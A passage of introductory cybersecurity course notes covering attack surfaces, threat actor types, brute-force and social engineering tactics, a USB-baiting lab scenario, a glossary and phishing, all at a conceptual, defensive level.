recognize that keeping the database server open to the public is a serious vulnerability.
A vulnerability assessment of the situation can help you communicate the potential risks
with decision makers at the company. You must create a written report that clearly
explains how the vulnerable server is a risk to business operations and how it can be
secured.
*Ensure that each point is included in the final version of the portfolio
assessment before publishing for public view.
1.
Question 1
Your report provides a clear purpose for why the vulnerability assessment of the system is valuable to
the business.
2.
Question 2
In the risk assessment section of your report, do you consider potential threat sources of the vulnerable
database?
3.
Question 3
In the risk assessment section of your report, can each threat event reasonably be initiated by its related
threat sources?
4.
Question 4
Does the risk assessment table of your report contain likelihood, severity, and risk scores for each
potential threat source?
5.
Question 5
Your report explains the approach you took to analyze risk and provides a remediation strategy for
securing the vulnerable system.
Protect all entry points
There's a wide range of vulnerabilities and systems that need to be found. Assessing those
weaknesses is a time-consuming process. To position themselves ahead of threats and make the
most of their limited resources, companies start by understanding the environment surrounding
their operations. An important part of this is getting a sense of their attack surface. An attack
surface is all the potential vulnerabilities that a threat actor could exploit. Analyzing the attack
surface is usually the first thing security teams do. For example, imagine being part of
a security team of an old castle. Your team would need to decide how to allocate resources to
defenses. Giant walls, stone towers, and wooden gates are a few common security controls of these
structures. While these are all designed to protect the assets inside from attacks, they don't exactly
account for all the possibilities. What if the castle were near the ocean? If it were, these defenses
would be vulnerable to long range attacks by ship. A proper understanding of the attack surface
would mean your security team equipped the castle with catapults that could deal with these kinds
of threats. Modern organizations need to concern themselves with both a physical and digital attack
surface. The physical attack surface is made up of people and their devices. This surface can be
attacked from both inside and outside the organization, which makes it unique. For example, let's
consider an unattended laptop in a public space, like a coffee shop. The person responsible for it
walked away while sensitive company information was visible on the screen. This information is
vulnerable to external threats, like a business competitor, who can easily record the information
and exploit it. An internal threat of this attack surface, on the other hand, is often angry employees.
These employees might share an organization's private information on purpose. In general, the
physical attack surface should be filled with obstacles that deter attacks from happening. We call
this process security hardening. Security hardening is the process of strengthening a system to
reduce its vulnerabilities and attack surface. In other words, hardening is the act of minimizing the
attack surface by limiting its points of entry. We do this a lot in security because the smaller the
attack surface, the easier it is to protect. In fact, some security controls that we've explored
previously, like organization policies and access controls, are common ways that organizations
harden their physical attack surface. The digital attack surface is a bit tougher to harden. The digital
attack surface includes everything that's beyond our organization's firewall. In other words, it
includes anything that connects to an organization online. In the past, organizations stored their
data in a single location. This mainly consisted of servers that were managed on-site. Accessing the
information stored on those servers required connecting to the network the workplace managed.
These days, information is accessed outside of an organization's network because it's stored in the
cloud. Information can be accessed from anywhere in the world. A person can be in one part of the
world, fly to another place, and continue working. All while outside of their organization's network.
Cloud computing has essentially expanded the digital attack surface. Quicker access to information
is something we all benefit from, but it comes with a cost. Organizations of all sizes are under more
pressure to defend against threats coming from different entry points.
Approach cybersecurity with an attacker mindset
Cybersecurity is a continuously changing field. It's a fast-paced environment where new threats and
innovative technologies can disrupt your plans at a moment's notice. As a security professional, it’s up to
you to be prepared by anticipating change.
This all starts with identifying vulnerabilities. In a video, you learned about the importance of
vulnerability assessments, the internal review process of an organization's security systems. In this
reading, you will learn how you can use the findings of a vulnerability assessment proactively by
analyzing them from the perspective of an attacker.
Being prepared for anything
Having a plan should things go wrong is important. But how do you figure out what to plan for? In this
field, teams often conduct simulations of things that can go wrong as part of their vulnerability
management strategy. One way this is done is by applying an attacker mindset to the weaknesses they
discover.
Applying an attacker mindset is a lot like conducting an experiment. It's about causing problems in a
controlled environment and evaluating the outcome to gain insights. Adopting an attacker mindset is a
beneficial skill in security because it offers a different perspective about the challenges you're trying to
solve. The insights you gain can be valuable when it's time to establish a security plan or modify an
existing one.
Simulating threats
One method of applying an attacker mindset is using attack simulations. These activities are normally
performed in one of two ways: proactively and reactively. Both approaches share a common goal, which
is to make systems safer.
●
Proactive simulations assume the role of an attacker by exploiting vulnerabilities and breaking
●
through defenses. This is sometimes called a red team exercise.
Reactive simulations assume the role of a defender responding to an attack. This is sometimes
called a blue team exercise.
Each kind of simulation is a team effort that you might be involved with as an analyst.
Proactive teams tend to spend more time planning their attacks than performing them. If you find
yourself engaged in one of these exercises, your team will likely deploy a range of tactics. For example,
they might persuade staff into disclosing their login credentials using fictitious emails to evaluate
security awareness at the company.
On the other hand, reactive teams dedicate their efforts to gathering information about the assets
they're protecting. This is commonly done with the assistance of vulnerability scanning tools.
Scanning for trouble
You might recall that a vulnerability scanner is software that automatically compares existing common
vulnerabilities and exposures against the technologies on the network. Vulnerability scanners are
frequently used in the field. Security teams employ a variety of scanning techniques to uncover
weaknesses in their defenses. Reactive simulations often rely on the results of a scan to weigh the risks
and determine ways to remediate a problem.
For example, a team conducting a reactive simulation might perform an external vulnerability scan of
their network. The entire exercise might follow the steps you learned in a video about vulnerability
assessments:
●
●
●
●
Identification: A vulnerable server is flagged because it's running an outdated operating system
(OS).
Vulnerability analysis: Research is done on the outdated OS and its vulnerabilities.
Risk assessment: After doing your due diligence, the severity of each vulnerability is scored and
the impact of not fixing it is evaluated.
Remediation: Finally, the information that you’ve gathered can be used to address the issue.
During an activity like this, you’ll often produce a report of your findings. These can be brought to the
attention of service providers or your supervisors. Clearly communicating the results of these exercises
to others is an important skill to develop as a security professional.
Finding innovative solutions
Many security controls that you’ve learned about were created as a reactive response to risks. That’s
because criminals are continually looking for ways to bypass existing defenses. Effectively applying an
attacker mindset will require you to stay knowledgeable of security trends and emerging technologies.
Pro tip: Resources like NISTs National Vulnerability Database (NVD) can help you remain current on
common vulnerabilities.
Key takeaways
Vulnerability assessments are an important part of security risk planning. As an analyst, you’ll likely
participate in proactive and reactive simulations of these activities. Preparing yourself by researching
common vulnerabilities only goes so far. It’s equally important that you stay informed about new
technologies to be able to think with an innovative mindset.
Types of threat actors
Anticipating attacks is an important skill you’ll need to be an effective security professional. Developing
this skill requires you to have an open and flexible mindset about where attacks can come from.
Previously, you learned about attack surfaces, which are all the potential vulnerabilities that a threat
actor could exploit.
Networks, servers, devices, and staff are examples of attack surfaces that can be exploited. Security
teams of all sizes regularly find themselves defending these surfaces due to the expanding digital
landscape. The key to defending any of them is to limit access to them.
In this reading, you’ll learn more about threat actors and the types of risks they pose. You’ll also explore
the most common features of an attack surface that threat actors can exploit.
Threat actors
A threat actor is any person or group who presents a security risk. This broad definition refers to people
inside and outside an organization. It also includes individuals who intentionally pose a threat, and
those that accidentally put assets at risk. That’s a wide range of people!
Threat actors are normally divided into five categories based on their motivations:
●
●
●
●
●
Competitors refers to rival companies who pose a threat because they might benefit from leaked
information.
State actors are government intelligence agencies.
Criminal syndicates refer to organized groups of people who make money from criminal activity.
Insider threats can be any individual who has or had authorized access to an organization’s
resources. This includes employees who accidentally compromise assets or individuals who
purposefully put them at risk for their own benefit.
Shadow IT refers to individuals who use technologies that lack IT governance. A common
example is when an employee uses their personal email to send work-related communications.
In the digital attack surface, these threat actors often gain unauthorized access by hacking into systems.
By definition, a hacker is any person who uses computers to gain access to computer systems, networks,
or data. Similar to the term threat actor, hacker is also an umbrella term. When used alone, the term fails
to capture a threat actor’s intentions.
Types of hackers
Because the formal definition of a hacker is broad, the term can be a bit ambiguous. In security, it applies
to three types of individuals based on their intent:
1. Unauthorized hackers
2. Authorized, or ethical, hackers
3. Semi-authorized hackers
An unauthorized hacker, or unethical hacker, is an individual who uses their programming skills to
commit crimes. Unauthorized hackers are also known as malicious hackers. Skill level ranges widely
among this category of hacker. For example, there are hackers with limited skills who can’t write their
own malicious software, sometimes called script kiddies. Unauthorized hackers like this carry out
attacks using pre-written code that they obtain from other, more skilled hackers.
Authorized, or ethical, hackers refer to individuals who use their programming skills to improve an
organization's overall security. These include internal members of a security team who are concerned
with testing and evaluating systems to secure the attack surface. They also include external security
vendors and freelance hackers that some companies incentivize to find and report vulnerabilities, a
practice called bug bounty programs.
Semi-authorized hackers typically refer to individuals who might violate ethical standards, but are not
considered malicious. For example, a hacktivist is a person who might use their skills to achieve a
political goal. One might exploit security vulnerabilities of a public utility company to spread awareness
of their existence. The intentions of these types of threat actors is often to expose security risks that
should be addressed before a malicious hacker finds them.
Advanced persistent threats
Many malicious hackers find their way into a system, cause trouble, and then leave. But on some
occasions, threat actors stick around. These kinds of events are known as advanced persistent threats,
or APTs.
An advanced persistent threat (APT) refers to instances when a threat actor maintains unauthorized
access to a system for an extended period of time. The term is mostly associated with nation states and
state-sponsored actors. Typically, an APT is concerned with surveilling a target to gather information.
They then use the intel to manipulate government, defense, financial, and telecom services.
Just because the term is associated with state actors does not mean that private businesses are safe from
APTs. These kinds of threat actors are stealthy because hacking into another government agency or
utility is costly and time consuming. APTs will often target private organizations first as a step towards
gaining access to larger entities.
Access points
Each threat actor has a unique motivation for targeting an organization's assets. Keeping them out takes
more than knowing their intentions and capabilities. It’s also important to recognize the types of attack
vectors they’ll use.
For the most part, threat actors gain access through one of these attack vector categories:
●
●
●
●
●
Direct access, referring to instances when they have physical access to a system
Removable media, which includes portable hardware, like USB flash drives
Social media platforms that are used for communication and content sharing
Email, including both personal and business accounts
Wireless networks on premises
●
●
Cloud services usually provided by third-party organizations
Supply chains like third-party vendors that can present a backdoor into systems
Any of these attack vectors can provide access to a system. Recognizing a threat actor’s intentions can
help you determine which access points they might target and what ultimate goals they could have. For
example, remote workers are more likely to present a threat via email than a direct access threat.
Key takeaways
Defending an attack surface starts with thinking like a threat actor. As a security professional, it’s
important to understand why someone would pose a threat to organizational assets. This includes
recognizing that every threat actor isn’t intentionally out to cause harm.
It’s equally important to recognize the ways in which a threat actor might gain access to a system.
Matching intentions with attack vectors is an invaluable skill as you continue to develop an attacker
mindset.
Pathways through Defense
To defend against attacks, organizations need to have more than just the understanding of the
growing digital landscape around them. Positioning themselves ahead
of a cyber threat also takes understanding the type of attacks that can be used against them. Last
time, we began exploring how the cloud has expanded the digital attack surface that organizations
protect. As a result, cloud computing has led to an increase in the number attack vectors available.
Attack vectors refer to the pathways attackers use to penetrate security defenses. Like the doors and
windows of a home, these pathways are the exploitable features of an attack surface. One example of
an attack vector would be social media. Another would be removable media, like a USB drive. Most
people outside of security assume that cyber criminals are the only ones out there exploiting attack
vectors. While attack vectors are used by malicious hackers to steal information, other groups use
them too. For example, employees occasionally exploit attack vectors unintentionally. This happens
a lot with social media platforms. Sometimes, employees post sensitive company news that shouldn't
have been shared. At times, this same kind of thing happens on purpose. Social media platforms are
also vectors that disgruntled employees use to intentionally share confidential information that can
harm the company. We all treat attack vectors as critical risks to asset security. Attackers typically
put forth a lot of effort planning their attacks before carrying them out. It's up to us as security
professionals to put an even greater amount of effort into stopping them. Security teams do this by
thinking of each vector with an attacker mindset. This starts with a simple question, "how would we
exploit this vector?" We then go through a step-by-step process to answer our question. First, when
practicing an attacker mindset, we identify a target. This could be specific information, a system, a
person, a group, or the organization itself. Next, we determine how the target can be accessed. What
information is available that an attacker might take advantage of to reach the target? Based on that
information, the third step is to evaluate the attack vectors that can be exploited to gain entry. And
finally, we find the tools and methods of attack. What will the attackers use to carry this out? Along
the way, practicing an attacker mindset provides valuable insight into the best security controls to
implement and the vulnerabilities that need to be monitored. Every organization has a long list of
attack vectors to defend. While there are a lot of ways to protect them, there are a few common rules
for doing this. One key to defending attack vectors is educating users about security vulnerabilities.
These efforts are usually tied to an event. For example, advising them about a new phishing exploit
that is targeting users in the organization. Another rule is applying the principle of least privilege.
We've explored least privilege earlier in this section. It's the idea that access rights should be limited
to what's required to perform a task. Like we previously explored, this practice closes multiple
security holes inside an organization's attack surface. Next, using the right security controls and tools
can go a long way towards defending attack vectors. Even the most knowledgeable employees make
security mistakes, like accidentally clicking on a malicious link in an email. Having the right security
tools in place, like antivirus software, helps to defend attack vectors more efficiently and reduce the
risk of human error. Finally, is building a diverse security team. This is one of the best ways to reduce
the risk of attack vectors and prevent future attacks. Your own unique perspective can greatly
improve the security team's ability to apply an attacker's mindset and stay one step ahead of potential
threats.
Activity Overview
Now that you've been introduced to attack surfaces and attack vectors, you can pause for a moment and
think about what you are learning. In this self-reflection, you will think about how these factors can help
identify threats and respond to brief questions.
You have learned many skills and concepts in this course. Completing this self-reflection will help you
understand how you might use what you’ve learned for different tasks and roles in the security field.
Answering and asking questions in this self-reflection will help to reinforce what you’ve learned, so it
will be easier for you to remember it later.
Review the steps of applying an attacker mindset
Previously, you learned that applying an attacker mindset to any situation starts by asking yourself,
“How would I exploit this vector?” This will require you to consider two elements: the attack surface and
its attack vectors.
Remember, an attack surface includes all the potential vulnerabilities that a threat actor could exploit.
An attack vector is the pathway that an attacker uses to penetrate security defenses of an attack surface.
After considering these elements, you can then go through a step-by-step process to apply an attacker
mindset:
●
●
●
●
Identify a target
Determine how the target can be accessed
Evaluate attack vectors that can be exploited
Find the tools and methods of attack
For a refresher on the elements of an attacker mindset, you can review the video on attack vectors and
the video on attack surfaces.
Fortify against brute force cyber attacks
Usernames and passwords are one of the most common and important security controls in
use today. They’re like the door lock that organizations use to restrict access to their
networks, services, and data. But a major issue with relying on login credentials as a critical
line of defense is that they’re vulnerable to being stolen and guessed by attackers.
In a video, you learned that brute force attacks are a trial-and-error process of discovering
private information. In this reading, you’ll learn about the many tactics and tools used by
threat actors to perform brute force attacks. You’ll also learn prevention strategies that
organizations can use to defend against them.
A matter of trial and error
One way of opening a closed lock is trying as many combinations as possible. Threat actors
sometimes use similar tactics to gain access to an application or a network.
Attackers use a variety of tactics to find their way into a system:
●
Simple brute force attacks are an approach in which attackers guess a user's login
credentials. They might do this by entering any combination of username and
password that they can think of until they find the one that works.
● Dictionary attacks are a similar technique except in these instances attackers use a
list of commonly used credentials to access a system. This list is similar to matching
a definition to a word in a dictionary.
● Reverse brute force attacks are similar to dictionary attacks, except they start with a
single credential and try it in various systems until a match is found.
● Credential stuffing is a tactic in which attackers use stolen login credentials from
previous data breaches to access user accounts at another organization. A
specialized type of credential stuffing is called pass the hash. These attacks reuse
stolen, unsalted hashed credentials to trick an authentication system into creating a
new authenticated user session on the network.
Note: Besides access credentials, encrypted information can sometimes be brute forced
using a technique known as exhaustive key search.
Each of these methods involve a lot of guess work. Brute forcing your way into a system can
be a tedious and time consuming process—especially when it’s done manually. That’s why
threat actors often use tools to conduct their attacks.
Tools of the trade
There are so many combinations that can be used to create a single set of login credentials.
The number of characters, letters, and numbers that can be mixed together is truly
incredible. When done manually, it could take someone years to try every possible
combination.
Instead of dedicating the time to do this, attackers often use software to do the guess work
for them. These are some common brute forcing tools:
●
●
Aircrack-ng
Hashcat
●
●
●
John the Ripper
Ophcrack
THC Hydra
Sometimes, security professionals use these tools to test and analyze their own systems.
They each serve different purposes. For example, you might use Aircrack-ng to test a Wi-Fi
network for vulnerabilities to brute force attack.
Prevention measures
Organizations defend against brute force attacks with a combination of technical and
managerial controls. Each make cracking defense systems through brute force less likely:
●
●
●
●
Hashing and salting
Multi-factor authentication (MFA)
CAPTCHA
Password policies
Technologies, like multi-factor authentication (MFA), reinforce each login attempt by
requiring a second or third form of identification. Other important tools are CAPTCHA and
effective password policies.
Hashing and salting
Hashing converts information into a unique value that can then be used to determine its
integrity. Salting is an additional safeguard that’s used to strengthen hash functions. It
works by adding random characters to data, like passwords. This increases the length and
complexity of hash values, making them harder to brute force and less susceptible to
dictionary attacks.
Multi-factor authentication (MFA)
Multi-factor authentication (MFA) is a security measure that requires a user to verify their
identity in two or more ways to access a system or network. MFA is a layered approach to
protecting information. MFA limits the chances of brute force attacks because unauthorized
users are unlikely to meet each authentication requirement even if one credential becomes
compromised.
CAPTCHA
CAPTCHA stands for Completely Automated Public Turing test to tell Computers and
Humans Apart. It is known as a challenge-response authentication system. CAPTCHA asks
users to complete a simple test that proves they are human and not software that’s trying
to brute force a password.
Here are common CAPTCHA examples:
There are two types of CAPTCHA tests. One scrambles and distorts a randomly generated
sequence of letters and/or numbers and asks users to enter them into a text box. The other
test asks users to match images to a randomly generated word. You’ve likely had to pass a
CAPTCHA test when accessing a web service that contains sensitive information, like an
online bank account.
Password policy
Organizations use these managerial controls to standardize good password practices
across their business. For example, one of these policies might require users to create
passwords that are at least 8 characters long and feature a letter, number, and symbol.
Other common requirements can include password lockout policies. For example, a
password lockout can limit the number of login attempts before access to an account is
suspended and require users to create new, unique passwords after a certain amount of
time.
The purpose of each of these requirements is to create more possible password
combinations. This lengthens the amount of time it takes an attacker to find one that will
work. The National Institute of Standards and Technology (NIST) Special Publication 80063B provides detailed guidance that organizations can reference when creating their own
password policies.
Key takeaways
Brute force attacks are simple yet reliable ways to gain unauthorized access to systems.
Generally, the stronger a password is, the more resilient it is to being cracked. As a security
professional, you might find yourself using the tools described above to test the security of
your organization's systems. Recognizing the tactics and tools used to conduct a brute force
attack is the first step towards stopping attackers.
Activity Overview
In this activity, you will assess the attack vectors of a USB drive. You will consider a scenario of finding a
USB drive in a parking lot from both the perspective of an attacker and a target.
USBs, or flash drives, are commonly used for storing and transporting data. However, some
characteristics of these small, convenient devices can also introduce security risks. Threat actors
frequently use USBs to deliver malicious software, damage other hardware, or even take control of
devices. USB baiting is an attack in which a threat actor strategically leaves a malware USB stick for an
employee to find and install to unknowingly infect a network. It relies on curious people to plug in an
unfamiliar flash drive that they find.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You are part of the security team at Rhetorical Hospital and arrive to work one morning. On the ground
of the parking lot, you find a USB stick with the hospital's logo printed on it. There’s no one else around
who might have dropped it, so you decide to pick it up out of curiosity.
You bring the USB drive back to your office where the team has virtualization software installed on a
workstation. Virtualization software can be used for this very purpose because it’s one of the only ways
to safely investigate an unfamiliar USB stick. The software works by running a simulated instance of the
computer on the same workstation. This simulation isn’t connected to other files or networks, so the
USB drive can’t affect other systems if it happens to be infected with malicious software.
Step-By-Step Instructions
Follow the instructions and answer the question below to complete the activity.
Step 1: Access the template
To use the template for this course item, click the link and select Use Template.
Link to template: Parking lot USB exercise
Step 2: Inspect the contents of the USB stick
You create a virtual environment and plug the USB drive into the workstation. The contents of the device
appear to belong to Jorge Bailey, the human resource manager at Rhetorical Hospital.
Jorge's drive contains a mix of personal and work-related files. For example, it contains folders that
appear to store family and pet photos. There is also a new hire letter and an employee shift schedule.
Review the types of information that Jorge has stored on this device. Then, in the Contents row of the
activity template, write 2-3 sentences (40-60 words) about the type of information that's stored on the
USB drive.
Note: USB drives often contain an assortment of personally identifiable information (PII). Attackers can
easily use this sensitive information to target the data owner or others around them.
Step 3: Apply an attacker mindset to the contents of the USB drive
The flash drive appears to contain a mixture of personal and work-related files. Consider how an
attacker might use this information if they obtained it. Also, consider whether this whole event was
staged.
For example, an attacker could have placed these files on the USB drive as a distraction. They might have
targeted Jorge or someone he knows, hoping they would find the device and plug it into their
workstation. In doing so, the attacker could establish a backdoor into the company's systems while the
unsuspecting target browsed through the files.
In the Attacker mindset row of the activity template, write 2-3 sentences (40-60 words) about how this
information could be used against Jorge or the hospital.
Pro tip: The Cybersecurity and Infrastructure Security Agency (CISA) provides some security tips on
using caution with USB drives, including keeping personal and business drives separate.
Step 4: Analyze the risks of finding a parking lot USB
You have not opened any of the files on the device, which is best practice.
Attackers sometimes conduct USB baiting attacks to deliver malicious code that they've crafted.
However, this USB drive was still a security risk even though it did not contain malicious code. It could
have easily been found by an attacker who might have used its contents to plan a variety of attacks.
Consider some of the risks associated with USB baiting attacks:
●
●
●
What types of malicious software could be hidden on these devices? What could have happened
if the device were infected and discovered by another employee?
What sensitive information could a threat actor find on a device like this?
How might that information be used against an individual or an organization?
In the Risk analysis row of the activity template, write 3 or 4 sentences (60-80 words) describing any
technical, operational, or managerial controls that could mitigate USB baiting attacks.
What to Include in Your Response
Be sure to address the following criteria in your completed activity:
●
●
●
2-3 sentences about the types of information stored on the USB drive
2-3 sentences about how the information could be used against the owner and/or organization
3-4 sentences analyzing the risks of USB baiting attacks
●
Glossary terms from module 3
●
Terms and definitions from Course 5, Module 3
●
●
●
●
●
●
●
●
●
Advanced persistent threat (APT): An instance when a threat actor maintains
unauthorized access to a system for an extended period of time
Attack surface: All the potential vulnerabilities that a threat actor could exploit
Attack tree: A diagram that maps threats to assets
Attack vector: The pathways attackers use to penetrate security defenses
Bug bounty: Programs that encourage freelance hackers to find and report
vulnerabilities
Common Vulnerabilities and Exposures (CVE®) list: An openly accessible dictionary
of known vulnerabilities and exposures
Common Vulnerability Scoring System (CVSS): A measurement system that scores
the severity of a vulnerability
CVE Numbering Authority (CNA): An organization that volunteers to analyze and
distribute information on eligible CVEs
Defense in depth: A layered approach to vulnerability management that reduces risk
●
●
●
●
●
●
●
●
●
●
●
Exploit: A way of taking advantage of a vulnerability
Exposure: A mistake that can be exploited by a threat
Hacker: Any person who uses computers to gain access to computer systems,
networks, or data
MITRE: A collection of non-profit research and development centers
Security hardening: The process of strengthening a system to reduce its
vulnerability and attack surface
Threat actor: Any person or group who presents a security risk
Vulnerability: A weakness that can be exploited by a threat
Vulnerability assessment: The internal review process of a company’s security
systems
Vulnerability management: The process of finding and patching vulnerabilities
Vulnerability scanner: Software that automatically compares existing common
vulnerabilities and exposures against the technologies on the network
Zero-day: An exploit that was previously unknown
The Criminal Art of Persuasion
When you hear the word "cybercriminal", what comes to mind? You may imagine a hacker hunched
over a computer in a dark room. If this is what came to mind, you're not alone. In fact, this is what
most people outside of security think of. But online criminals aren't always that different from
those operating in the real world. Malicious hackers are just one type of online criminal. They are a
specific kind that relies on sophisticated computer programming skills to pull off their attacks.
There are other ways to commit crimes that don't require programming skills. Sometimes,
criminals rely on a more traditional approach, manipulation. Social engineering is a manipulation
technique that exploits human error to gain private information,
access, or valuables. These tactics trick people into breaking normal security procedures
on the attacker's behalf. This can lead to data exposures, widespread malware infections, or
unauthorized access to restricted systems. Social engineering attacks can happen anywhere. They
happen online, in-person, and through other interactions. Threat actors use many different tactics
to carry out their attacks. Some attacks can take a matter of seconds to perform. For example,
someone impersonating tech support asks an employee for their password to fix their computer.
Other attacks can take months or longer, such as threat actors monitoring an employee's social
media. The employee might post a comment saying they've gotten a temporary position in a new
role at the company. An attacker might use an opportunity like this to target the temporary worker,
who is likely to be less knowledgeable about security procedures. Regardless of the timeframe,
knowing what to look for can help you quickly identify and stop an attack in its tracks. There are
multiple stages of social engineering attacks. The first is usually to prepare. At this stage, attackers
gather information about their target. Using the intel, they'll determine the best way to exploit
them. In the next stage, attackers establish trust. This is often referred to as pretexting. Here,
attackers use the information they gathered earlier to open a line of communication. They'll
typically disguise themselves to trick their target into a false sense of trust. After that, attackers use
persuasion tactics. This stage is where the earlier preparation really matters. This is when the
attacker manipulates their target into volunteering information. Sometimes they do this by using
specific vocabulary that makes them sound like a member of the organization. The final stage of the
process is to disconnect from the target. After they collect the information they want, attackers
break communication with their target. They disappear to cover their tracks. Criminals who use
social engineering are stealthy. The digital world has expanded their capabilities. It's also created
more ways for them to go unnoticed. Still, there are ways that we can prevent their attacks.
Implementing managerial controls like policies, standards, and procedures, are one of the first lines
of defense. For example, businesses often follow the patch management standard defined in NIST
Special Publication 800-40. These standards are used to create procedures for updating operating
systems, applications, and firmware that can be exploited. Staying informed of trends is also a
major priority for any security professional. An even better defense against social engineering
attacks is sharing what you know with others. Attackers play on our natural curiosity and desire to
help one another. Their hope is that targets won't think too hard about what's going on. Teaching
the signs of attack to others goes a long way towards preventing threats. Social engineering is a
threat to the assets and privacy of both individuals and organizations. Malicious attackers use a
variety of tactics to confuse and manipulate their targets.
Social engineering tactics
Social engineering attacks are a popular choice among threat actors. That’s because it’s
often easier to trick people into providing them with access, information, or money than it
is to exploit a software or network vulnerability.
As you might recall, social engineering is a manipulation technique that exploits human
error to gain private information, access, or valuables. It's an umbrella term that can apply
to a broad range of attacks. Each technique is designed to capitalize on the trusting nature
of people and their willingness to help. In this reading, you will learn about specific social
engineering tactics to watch out for. You’ll also learn ways that organizations counter these
threats.
Social engineering risks
Social engineering is a form of deception that takes advantage of the way people think. It
preys on people’s natural feelings of curiosity, generosity, and excitement. Threat actors
turn those feelings against their targets by affecting their better judgment. Social
engineering attacks can be incredibly harmful because of how easy they can be to
accomplish.
One of the highest-profile social engineering attacks that occurred in recent years was the
Twitter Hack of 2020. During that incident, a group of hackers made phone calls to Twitter
employees pretending to be from the IT department. Using this basic scam, the group
managed to gain access to the organization’s network and internal tools. This allowed them
to take over the accounts of high-profile users, including politicians, celebrities, and
entrepreneurs.
Attacks like this are just one example of the chaos threat actors can create using basic
social engineering techniques. These attacks present serious risks because they don’t
require sophisticated computer skills to perform. Defending against them requires a multilayered approach that combines technological controls with user awareness.
Signs of an attack
Oftentimes, people are unable to tell that an attack is happening until it's too late. Social
engineering is such a dangerous threat because it typically allows attackers to bypass
technological defenses that are in their way. Although these threats are difficult to prevent,
recognizing the signs of social engineering is a key to reducing the likelihood of a successful
attack.
These are common types of social engineering to watch out for:
●
●
●
●
●
Baiting is a social engineering tactic that tempts people into compromising their
security. A common example is USB baiting that relies on someone finding an
infected USB drive and plugging it into their device.
Phishing is the use of digital communications to trick people into revealing sensitive
data or deploying malicious software. It is one of the most common forms of social
engineering, typically performed via email.
Quid pro quo is a type of baiting used to trick someone into believing that they’ll be
rewarded in return for sharing access, information, or money. For example, an
attacker might impersonate a loan officer at a bank and call customers offering them
a lower interest rate on their credit card. They'll tell the customers that they simply
need to provide their account details to claim the deal.
Tailgating is a social engineering tactic in which unauthorized people follow an
authorized person into a restricted area. This technique is also sometimes referred
to as piggybacking.
Watering hole is a type of attack when a threat actor compromises a website
frequently visited by a specific group of users. Oftentimes, these watering hole sites
are infected with malicious software. An example is the Holy Water attack of 2020
that infected various religious, charity, and volunteer websites.
Attackers might use any of these techniques to gain unauthorized access to an organization.
Everyone is vulnerable to them, from entry-level employees to senior executives. However,
you can reduce the risks of social engineering attacks at any business by teaching others
what to expect.
Encouraging caution
Spreading awareness usually starts with comprehensive security training. When it comes
to social engineering, there are three main areas to focus on when teaching others:
Stay alert of suspicious communications and unknown people, especially when it
comes to email. For example, look out for spelling errors and double-check the
sender's name and email address.
● Be cautious about sharing information, especially over social media. Threat actors
often search these platforms for any information they can use to their advantage.
● Control curiosity when something seems too good to be true. This can include
wanting to click on attachments or links in emails and advertisements.
●
Pro tip: Implementing technologies like firewalls, multi-factor authentication (MFA), block
lists, email filtering, and others helps layers the defenses should someone make a mistake.
Ideally, security training extends beyond employees. Educating customers about social
engineering threats is also a key to mitigating these threats. And security analysts play an
important part in promoting safe practices. For example, a big part of an analyst's job is
testing systems and documenting best practices for others at an organization to follow.
Key takeaways
People’s willingness to help one another and their trusting nature is what makes social
engineering such an appealing tactic for criminals. It just takes one act of kindness or a
momentary lapse in judgment for an attack to work. Criminals go to great lengths to make
their attacks difficult to detect. They rely on a variety of manipulation techniques to trick
their targets into granting them access. For that reason, implementing effective controls
and recognizing the signs of an attack go a long way towards preventing threats.
Resources for more information
Here are two additional resources to review that will help you continue developing your
understanding of social engineering trends and security practices:
OUCH! is a free monthly newsletter from the SANS Institute that reports on social
engineering trends and other security topics.
● Scamwatch is a resource for news and tools for recognizing, avoiding, and reporting
social engineering scams.
●
Phishing for information
Cybercriminals prefer attacks that do the most amount of damage with the least amount of effort.
One of the most popular forms of social engineering that meets this description is phishing.
Phishing is the use of digital communications to trick people into revealing sensitive data or
deploying malicious software. Phishing leverages many communication technologies, but the term
is mainly used to describe attacks that arrive by email. Phishing attacks don't just affect individuals.
They are also harmful to organizations. A single employee that falls for one of these tricks can give
malicious attackers access to systems. Once inside, attackers can exploit sensitive data like
customer names and product secrets. Attackers who carry out these attacks commonly use phishing
kits. A phishing kit is a collection of software tools needed to launch a phishing campaign. People
with little technical background can use one of these kits. Each of the tools inside are designed to
avoid detection. As a security professional, you should be aware of the three main tools inside a
phishing kit, so that you can quickly identify when they're being used and put a stop to it. The first
is malicious attachments. These are files that are infected and can cause harm to the organization's
systems. Phishing kits also include fake-data collection forms. These forms look like legitimate
forms, like a survey. Unlike a real survey, they ask for sensitive information that isn't normally
asked for in an email. The third resource they include are fraudulent web links. These open to
malicious web pages that are designed to look like trusted brands. Unlike actual websites, these
fraudulent sites are built to steal information, like login credentials. Cybercriminals can use these
tools to launch a phishing attack in many forms. The most common is through malicious emails.
However, they can use them in
other forms of communication too. Most recently, cybercriminals are using smishing and vishing to
trick people into revealing private information. Smishing is the use of text messages
to obtain sensitive information or to impersonate a known source. You've probably received these
types of messages before. Not only are smishing messages annoying to receive, they're also difficult
to prevent. That's why some attackers send them. Some smishing messages are easy to detect. They
might show signs of being malicious like promising a cash reward for clicking an attached link that
shouldn't be clicked. Other times, smishing is hard to spot. Attackers sometimes use local area
codes to appear legitimate. Some hackers can even send
messages disguised as friends and families of their target to fool them into disclosing sensitive
information. Vishing is the exploitation of electronic voice communication to obtain sensitive
information or impersonate a known source. During vishing attacks, criminals pretend to be
someone they're not. For example, attackers might call pretending to be a company representative.
They might claim that there's a problem with your account. And they can offer to fix it if you
provide them with sensitive information. Most organizations use a few basic security measures to
prevent these and any other types of phishing attacks from becoming a problem. For example, antiphishing policies spread awareness and encourage users to follow data
security procedures correctly. Employee training resources also help inform employees about
things to look for when an email looks suspicious. Another line of defense against phishing is
securing email inboxes. Email filters are commonly used to keep harmful messages from reaching
users. For example, specific email addresses can be blocked using a blocklist. Organizations often
use other filters, like allow lists, to specify IP addresses that are approved to send mail within the
company. Organizations also use intrusion prevention systems to look for unusual patterns in email
traffic. Security analysts use monitoring tools like this to spot suspicious emails, quarantine them,
and produce a log of events. Phishing campaigns are popular and dangerous forms of social
engineering that organizations of all sizes need to deal with. Just a single compromised password
that an attacker can get their hands on can lead to a costly data breach.
Types of phishing
Phishing is one of the most common types of social engineering, which are manipulation techniques that
exploit human error to gain private information, access, or valuables. Previously, you learned how
phishing is the use of digital communications to trick people into revealing sensitive data or deploying
malicious software.
Sometimes, phishing attacks appear to come from a trusted person or business. This can lead
unsuspecting recipients into acting against their better judgment, causing them to break security
procedures. In this reading, you’ll learn about common phishing tactics used by attackers today.
